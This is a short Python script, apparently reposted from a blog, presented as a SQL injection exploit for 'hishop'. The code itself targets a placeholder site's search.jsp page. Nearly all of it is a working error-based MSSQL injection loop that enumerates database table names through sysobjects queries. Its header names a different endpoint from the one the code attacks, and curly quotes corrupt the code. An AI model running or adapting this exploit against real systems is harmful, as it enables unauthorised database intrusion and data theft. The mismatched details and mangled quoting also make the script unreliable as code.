#coding:utf-8 #Author:LSA #Description:hishop sqli for /user/UserRefundApply?OrderId= #Date:20190701 import sys import requests from bs4 import BeautifulSoup import re headers = { ‘Cookie‘: ‘‘, ‘User-Agent‘: ‘Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36‘ } global tables_name tables_name = "‘XWCMFLOWACTION‘" #print tables_name def brute_tables(url): for i in range(0,300): url = ‘http://www.xxx.com/search/search.jsp?doctitle=100%27%20and%20(select%20top%201%20name%20from%20sysobjects%20where%20xtype=%27u%27%20and%20name%20not%20in%20(‘ + tables_name + ‘))%3E0--‘ print url rsp = requests.get(url,headers=headers) soup = BeautifulSoup(rsp.text,"lxml") title = soup.p.text print title table_name = re.findall(r"‘(.*?)‘",title) print table_name print table_name[0] global tables_name tables_name = tables_name + ‘,\‘‘ + table_name[0] + ‘\‘‘ print tables_name def main(url): brute_tables(url) if __name__ == ‘__main__‘: url = ‘http://www.xxx.com/search/search.jsp?doctitle=100%27%20and%20(select%20top%201%20name%20from%20sysobjects%20where%20xtype=%27u%27%20and%20name%20not%20in%20(‘ + tables_name + ‘))%3E0--‘ main(url)
原文:https://www.cnblogs.com/chrales/p/14852598.html